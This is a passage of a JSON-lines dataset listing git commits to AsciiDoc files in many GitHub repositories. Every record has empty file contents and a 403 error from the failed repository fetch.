symbol-function\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"03ae414cb6220262b388ea2da2e31f1492b4552d","subject":"added DEVELOPMENT.adoc","message":"added DEVELOPMENT.adoc\n","repos":"Petikoch\/jtrag","old_file":"DEVELOPMENT.adoc","new_file":"DEVELOPMENT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Petikoch\/jtrag.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"52cf017c36b08d3b3979c795c261d67eec244b47","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e15dcf57f7550a764cbfa4ddd0beee3ea7632261","subject":"Update 2017-07-21-Learning-to-reconstruct.adoc","message":"Update 2017-07-21-Learning-to-reconstruct.adoc","repos":"adler-j\/adler-j.github.io,adler-j\/adler-j.github.io","old_file":"_posts\/2017-07-21-Learning-to-reconstruct.adoc","new_file":"_posts\/2017-07-21-Learning-to-reconstruct.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adler-j\/adler-j.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2deb722a1f16a3e691f2963a7b6b8a0a60608638","subject":"JavaDoc links in 5.5 Handling Logouts fixed (#3993)","message":"JavaDoc links in 5.5 Handling Logouts fixed (#3993)\n\nFixes 
gh-3992","repos":"pwheel\/spring-security,jgrandja\/spring-security,thomasdarimont\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,SanjayUser\/SpringSecurityPro,mdeinum\/spring-security,ollie314\/spring-security,djechelon\/spring-security,jgrandja\/spring-security,mdeinum\/spring-security,thomasdarimont\/spring-security,mdeinum\/spring-security,wkorando\/spring-security,djechelon\/spring-security,SanjayUser\/SpringSecurityPro,pwheel\/spring-security,fhanik\/spring-security,eddumelendez\/spring-security,olezhuravlev\/spring-security,wkorando\/spring-security,jgrandja\/spring-security,jgrandja\/spring-security,pwheel\/spring-security,jgrandja\/spring-security,ollie314\/spring-security,mdeinum\/spring-security,kazuki43zoo\/spring-security,spring-projects\/spring-security,kazuki43zoo\/spring-security,fhanik\/spring-security,ollie314\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security,wkorando\/spring-security,eddumelendez\/spring-security,fhanik\/spring-security,eddumelendez\/spring-security,ollie314\/spring-security,olezhuravlev\/spring-security,olezhuravlev\/spring-security,spring-projects\/spring-security,kazuki43zoo\/spring-security,fhanik\/spring-security,olezhuravlev\/spring-security,pwheel\/spring-security,wkorando\/spring-security,fhanik\/spring-security,thomasdarimont\/spring-security,djechelon\/spring-security,olezhuravlev\/spring-security,kazuki43zoo\/spring-security,djechelon\/spring-security,fhanik\/spring-security,eddumelendez\/spring-security,pwheel\/spring-security,SanjayUser\/SpringSecurityPro,kazuki43zoo\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,thomasdarimont\/spring-security,rwinch\/spring-security,djechelon\/spring-security,spring-projects\/spring-security,thomasdarimont\/spring-security,SanjayUser\/SpringSecurityPro,spring-projects\/spring-security,eddumelendez\/spring-security,SanjayUser\/SpringSecurityPro,rwinch\/spring-security,rwinch\/spring-security","old_file":"docs\/manual\/src\/docs\/asciidoc\/index.adoc","new_file":"docs\/manual\/src\/docs\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fhanik\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0545d80d4df0dcb38be9a8f7a317b3fed6fb8c07","subject":"Update 2016-01-23-XML-Prague-2016.adoc","message":"Update 2016-01-23-XML-Prague-2016.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-XML-Prague-2016.adoc","new_file":"_posts\/2016-01-23-XML-Prague-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47ac08f6b210807645f519562190029dc715e02b","subject":"Update 2016-05-31-Rinna-In-Pepper.adoc","message":"Update 2016-05-31-Rinna-In-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-31-Rinna-In-Pepper.adoc","new_file":"_posts\/2016-05-31-Rinna-In-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL 
returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dcfe82f05a8045adf88e6d1661e5e518da987477","subject":"Update 2018-05-28-Swift-Firestore.adoc","message":"Update 2018-05-28-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d89884e1c7b9e579a5767539130e6c4d80ff88d7","subject":"Update 2017-08-21-.adoc","message":"Update 2017-08-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-21-.adoc","new_file":"_posts\/2017-08-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"81d0b44a58a497c83a681d56908f89fe79c43c03","subject":"Update 2018-04-02-.adoc","message":"Update 2018-04-02-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-02-.adoc","new_file":"_posts\/2018-04-02-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3cec335556790106ea98eec2e591a142d878acce","subject":"Update 2018-06-24-.adoc","message":"Update 2018-06-24-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-.adoc","new_file":"_posts\/2018-06-24-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c2f5b7e45ac2658da8d0908be1ef02febeb369b","subject":"Update knowledgebase proto link","message":"Update knowledgebase proto link","repos":"Onager\/artifacts,ForensicArtifacts\/artifacts,Onager\/artifacts,joachimmetz\/artifacts,joachimmetz\/artifacts,pstirparo\/artifacts,ForensicArtifacts\/artifacts,pstirparo\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joachimmetz\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9e4932d40099c9d992305e2ee65135e54fbb260c","subject":"git: add 'better force push' howto","message":"git: add 'better force push' 
howto\n","repos":"vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam","old_file":"git\/better-force-push.adoc","new_file":"git\/better-force-push.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vmiklos\/vmexam.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d33f5acc02d47a46e166105a99b4cf5ff80dab80","subject":"y2b create post Ali-A's Gaming Setup \\u0026 Room Tour (Epic Setup)","message":"y2b create post Ali-A's Gaming Setup \\u0026 Room Tour (Epic Setup)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-02-28-AliAs-Gaming-Setup-u0026-Room-Tour-Epic-Setup.adoc","new_file":"_posts\/2013-02-28-AliAs-Gaming-Setup-u0026-Room-Tour-Epic-Setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46eb99d4540beb11df04a0403b02e2bfaedbb811","subject":"Renamed '_posts\/2020-06-11-how-i-use-meteor-elm-and-tailwindcss-together.adoc' to '_posts\/2020-06-17-how-i-use-meteor-elm-and-tailwindcss-together.adoc'","message":"Renamed '_posts\/2020-06-11-how-i-use-meteor-elm-and-tailwindcss-together.adoc' to '_posts\/2020-06-17-how-i-use-meteor-elm-and-tailwindcss-together.adoc'","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2020-06-17-how-i-use-meteor-elm-and-tailwindcss-together.adoc","new_file":"_posts\/2020-06-17-how-i-use-meteor-elm-and-tailwindcss-together.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03034bf0bb450162a444f0c927da9d68272fe8b2","subject":"Update conference-java-Conference-annotations-java-compte-rendu.adoc","message":"Update conference-java-Conference-annotations-java-compte-rendu.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/conference-java-Conference-annotations-java-compte-rendu.adoc","new_file":"_posts\/conference-java-Conference-annotations-java-compte-rendu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"580dd07c073d7aa1592b2aac2206f6e3cd673b26","subject":"Update 2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","message":"Update 2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","new_file":"_posts\/2013-11-11-javaee7-websocket-angularjs-wildfly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"05c704acd007d18c98a0c1cba483934d18a99fbe","subject":"Update 
2015-02-10-Nimbuslabel-module-for-Appcelerator.adoc","message":"Update 2015-02-10-Nimbuslabel-module-for-Appcelerator.adoc","repos":"ludolphus\/hubpress.io,ludolphus\/hubpress.io,ludolphus\/hubpress.io","old_file":"_posts\/2015-02-10-Nimbuslabel-module-for-Appcelerator.adoc","new_file":"_posts\/2015-02-10-Nimbuslabel-module-for-Appcelerator.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ludolphus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"de32f5026e12e859fc8eadfdb9ebc9230e0d6607","subject":"Update 2015-03-03-Les-Bases-de-la-Culture-Finlandaise.adoc","message":"Update 2015-03-03-Les-Bases-de-la-Culture-Finlandaise.adoc","repos":"TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io","old_file":"_posts\/2015-03-03-Les-Bases-de-la-Culture-Finlandaise.adoc","new_file":"_posts\/2015-03-03-Les-Bases-de-la-Culture-Finlandaise.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TeksInHelsinki\/TeksInHelsinki.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c60d3992d10478d522707381ead37679d3b8e01a","subject":"y2b create post World's Thinnest iPhone Battery Case!","message":"y2b create post World's Thinnest iPhone Battery Case!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-13-Worlds-Thinnest-iPhone-Battery-Case.adoc","new_file":"_posts\/2016-06-13-Worlds-Thinnest-iPhone-Battery-Case.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6fc81e59569024537e96af002d14907c60ac892d","subject":"y2b create post Get The iPhone X Notch On Any Phone...","message":"y2b create post Get The iPhone X Notch On Any Phone...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-09-20-Get-The-iPhone-X-Notch-On-Any-Phone.adoc","new_file":"_posts\/2017-09-20-Get-The-iPhone-X-Notch-On-Any-Phone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2b170581d2642321a2241da4ff513809a5544afa","subject":"Update 2016-7-2-thinphp.adoc","message":"Update 2016-7-2-thinphp.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-7-2-thinphp.adoc","new_file":"_posts\/2016-7-2-thinphp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2bf54282be291301b4bcc2b8f2f6376cbae5313d","subject":"Update 2017-02-09-test1.adoc","message":"Update 
2017-02-09-test1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-test1.adoc","new_file":"_posts\/2017-02-09-test1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ece2ef071b58deaadc65c4081e70cf7aab7b45d5","subject":"Update 2016-05-23-Horoshij-spravochnik-po-ASCIIDOC.adoc","message":"Update 2016-05-23-Horoshij-spravochnik-po-ASCIIDOC.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2016-05-23-Horoshij-spravochnik-po-ASCIIDOC.adoc","new_file":"_posts\/2016-05-23-Horoshij-spravochnik-po-ASCIIDOC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce23004bdcae73a0ed5ef7ef78fb97d4cdea458c","subject":"Add master.adoc for documentation","message":"Add master.adoc for documentation\n","repos":"EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse","old_file":"documentation\/master.adoc","new_file":"documentation\/master.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenmalloy\/enmasse.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4b56c7a376025e15df749dd4575df6af5f1671c2","subject":"added","message":"added\n","repos":"m-m-m\/mmm,m-m-m\/mmm","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/m-m-m\/mmm.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5ba4a6f402b14bb11d544c2ced3c9b3633515d4e","subject":"y2b create post Twelve South MagicWand Unboxing \\u0026 Overview","message":"y2b create post Twelve South MagicWand Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-03-09-Twelve-South-MagicWand-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-03-09-Twelve-South-MagicWand-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1924f93f1001528ca5e4e25c85906d604ee3ee75","subject":"Update 2016-03-30-Subiendo-el-exploit.adoc","message":"Update 2016-03-30-Subiendo-el-exploit.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Subiendo-el-exploit.adoc","new_file":"_posts\/2016-03-30-Subiendo-el-exploit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5307425a66232f41289f124a776dc1896bd7d8fc","subject":"Update 2017-01-11-dnvod-filter-the-ad.adoc","message":"Update 2017-01-11-dnvod-filter-the-ad.adoc","repos":"xinmeng1\/note,xinmeng1\/note,xinmeng1\/note,xinmeng1\/note","old_file":"_posts\/2017-01-11-dnvod-filter-the-ad.adoc","new_file":"_posts\/2017-01-11-dnvod-filter-the-ad.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xinmeng1\/note.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc15a6e08fac6c6445dfd5dac50102560f7b93a6","subject":"chore(ch2): id\u304c\u91cd\u8907\u3057\u305f\u306e\u3067\u4fee\u6b63","message":"chore(ch2): id\u304c\u91cd\u8907\u3057\u305f\u306e\u3067\u4fee\u6b63\n","repos":"xifeiwu\/promises-book,mzbac\/promises-book,liubin\/promises-book,azu\/promises-book,tangjinzhou\/promises-book,azu\/promises-book,purepennons\/promises-book,xifeiwu\/promises-book,liyunsheng\/promises-book,wangwei1237\/promises-book,sunfurong\/promise,wangwei1237\/promises-book,tangjinzhou\/promises-book,oToUC\/promises-book,cqricky\/promises-book,charlenopires\/promises-book,wangwei1237\/promises-book,lidasong2014\/promises-book,oToUC\/promises-book,cqricky\/promises-book,azu\/promises-book,xifeiwu\/promises-book,mzbac\/promises-book,charlenopires\/promises-book,tangjinzhou\/promises-book,wenber\/promises-book,liubin\/promises-book,wenber\/promises-book,cqricky\/promises-book,sunfurong\/promise,wenber\/promises-book,lidasong2014\/promises-book,liyunsheng\/promises-book,purepennons\/promises-book,genie88\/promises-book,charlenopires\/promises-book,azu\/promises-book,genie88\/promises-book,liubin\/promises-book,dieface\/promises-book,purepennons\/promises-book,dieface\/promises-book,lidasong2014\/promises-book,dieface\/promises-book,liyunsheng\/promises-book,genie88\/promises-book,oToUC\/promises-book,mzbac\/promises-book,sunfurong\/promise","old_file":"Appendix-Glossary\/readme.adoc","new_file":"Appendix-Glossary\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mzbac\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"616949a5beb8239862c64406d333ef8b5aec5df0","subject":"Add getting cwd","message":"Add getting cwd\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"421cab232e2969408e8acae28acebd9745a01a15","subject":"Update 2016-03-23-Paris-terrorists-used-burner-phones-to-evade-detection.adoc","message":"Update 2016-03-23-Paris-terrorists-used-burner-phones-to-evade-detection.adoc","repos":"fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly","old_file":"_posts\/2016-03-23-Paris-terrorists-used-burner-phones-to-evade-detection.adoc","new_file":"_posts\/2016-03-23-Paris-terrorists-used-burner-phones-to-evade-detection.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fwalloe\/infosecbriefly.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a562bd1e1df96d87eb27b3343d569237cc23cbd3","subject":"Update 
2015-09-24-Aspectos-importantes-del-UX-Rackcode.adoc","message":"Update 2015-09-24-Aspectos-importantes-del-UX-Rackcode.adoc","repos":"AlonsoCampos\/AlonsoCampos.github.io,AlonsoCampos\/AlonsoCampos.github.io,AlonsoCampos\/AlonsoCampos.github.io","old_file":"_posts\/2015-09-24-Aspectos-importantes-del-UX-Rackcode.adoc","new_file":"_posts\/2015-09-24-Aspectos-importantes-del-UX-Rackcode.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AlonsoCampos\/AlonsoCampos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd101d2f3775ba6957903bebb545b4af76c29d8a","subject":"Update 2015-02-10-Test.adoc","message":"Update 2015-02-10-Test.adoc","repos":"dan-blanchard\/blog,dan-blanchard\/blog,dan-blanchard\/blog","old_file":"_posts\/2015-02-10-Test.adoc","new_file":"_posts\/2015-02-10-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dan-blanchard\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f0fb7c46015902b279adb60ebc4ee18a49f03ac","subject":"Update 2017-01-27-Test.adoc","message":"Update 2017-01-27-Test.adoc","repos":"kreids\/kreids.github.io,kreids\/kreids.github.io,kreids\/kreids.github.io,kreids\/kreids.github.io","old_file":"_posts\/2017-01-27-Test.adoc","new_file":"_posts\/2017-01-27-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kreids\/kreids.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ce31bbbb77eea21b5a3b201dea6b83984e6ebbc","subject":"Update 2017-08-24-TEST.adoc","message":"Update 2017-08-24-TEST.adoc","repos":"ambarishpande\/blog,ambarishpande\/blog,ambarishpande\/blog,ambarishpande\/blog","old_file":"_posts\/2017-08-24-TEST.adoc","new_file":"_posts\/2017-08-24-TEST.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ambarishpande\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb6117b0a1ae877f5623d2395bb50a348d14a6f7","subject":"Update 2018-02-23-test.adoc","message":"Update 2018-02-23-test.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-test.adoc","new_file":"_posts\/2018-02-23-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8ea4c80726e47515e5c6c8752507b60e56a4e65","subject":"add new change","message":"add new change\n","repos":"jbosschina\/openshift-cookbooks","old_file":"openshift\/samples\/deploy-mysql-db.adoc","new_file":"openshift\/samples\/deploy-mysql-db.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbosschina\/openshift-cookbooks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"82c21ff5b3f1cf8d704d059aaebabadf1e9dd4ab","subject":"Documentation: Mention RPM repo does not work with older distributions","message":"Documentation: Mention RPM repo does not work with older distributions\n\nGetting this to work would be a 
lot of work (creating two different\nrepositories, having another GPG key, integrating this into our build).\n\nCloses #6498\n","repos":"Liziyao\/elasticsearch,jango2015\/elasticsearch,TonyChai24\/ESSource,diendt\/elasticsearch,clintongormley\/elasticsearch,bawse\/elasticsearch,huanzhong\/elasticsearch,masaruh\/elasticsearch,jpountz\/elasticsearch,slavau\/elasticsearch,iamjakob\/elasticsearch,clintongormley\/elasticsearch,fekaputra\/elasticsearch,coding0011\/elasticsearch,Widen\/elasticsearch,camilojd\/elasticsearch,lks21c\/elasticsearch,jango2015\/elasticsearch,fekaputra\/elasticsearch,likaiwalkman\/elasticsearch,wayeast\/elasticsearch,JackyMai\/elasticsearch,hanswang\/elasticsearch,vvcephei\/elasticsearch,loconsolutions\/elasticsearch,alexbrasetvik\/elasticsearch,mjhennig\/elasticsearch,weipinghe\/elasticsearch,milodky\/elasticsearch,thecocce\/elasticsearch,beiske\/elasticsearch,vingupta3\/elasticsearch,rhoml\/elasticsearch,kingaj\/elasticsearch,strapdata\/elassandra-test,lzo\/elasticsearch-1,shreejay\/elasticsearch,ulkas\/elasticsearch,lchennup\/elasticsearch,jaynblue\/elasticsearch,wittyameta\/elasticsearch,vroyer\/elassandra,umeshdangat\/elasticsearch,fred84\/elasticsearch,linglaiyao1314\/elasticsearch,smflorentino\/elasticsearch,elancom\/elasticsearch,infusionsoft\/elasticsearch,Shekharrajak\/elasticsearch,apepper\/elasticsearch,iamjakob\/elasticsearch,markllama\/elasticsearch,vroyer\/elasticassandra,scorpionvicky\/elasticsearch,mcku\/elasticsearch,iantruslove\/elasticsearch,nomoa\/elasticsearch,ThalaivaStars\/OrgRepo1,apepper\/elasticsearch,pranavraman\/elasticsearch,franklanganke\/elasticsearch,beiske\/elasticsearch,mbrukman\/elasticsearch,Brijeshrpatel9\/elasticsearch,wittyameta\/elasticsearch,wuranbo\/elasticsearch,wenpos\/elasticsearch,jimczi\/elasticsearch,caengcjd\/elasticsearch,nrkkalyan\/elasticsearch,kingaj\/elasticsearch,jw0201\/elastic,geidies\/elasticsearch,Liziyao\/elasticsearch,ESamir\/elasticsearch,schonfeld\/elasticsearch,truemped\/elasticsearch,pranavraman\/elasticsearch,elancom\/elasticsearch,alexshadow007\/elasticsearch,markllama\/elasticsearch,i-am-Nathan\/elasticsearch,AshishThakur\/elasticsearch,PhaedrusTheGreek\/elasticsearch,scottsom\/elasticsearch,mm0\/elasticsearch,MichaelLiZhou\/elasticsearch,mnylen\/elasticsearch,rlugojr\/elasticsearch,karthikjaps\/elasticsearch,IanvsPoplicola\/elasticsearch,kaneshin\/elasticsearch,18098924759\/elasticsearch,kubum\/elasticsearch,nknize\/elasticsearch,sauravmondallive\/elasticsearch,linglaiyao1314\/elasticsearch,fernandozhu\/elasticsearch,ouyangkongtong\/elasticsearch,djschny\/elasticsearch,coding0011\/elasticsearch,adrianbk\/elasticsearch,camilojd\/elasticsearch,kcompher\/elasticsearch,linglaiyao1314\/elasticsearch,abibell\/elasticsearch,nazarewk\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,s1monw\/elasticsearch,LeoYao\/elasticsearch,Liziyao\/elasticsearch,zhiqinghuang\/elasticsearch,liweinan0423\/elasticsearch,vroyer\/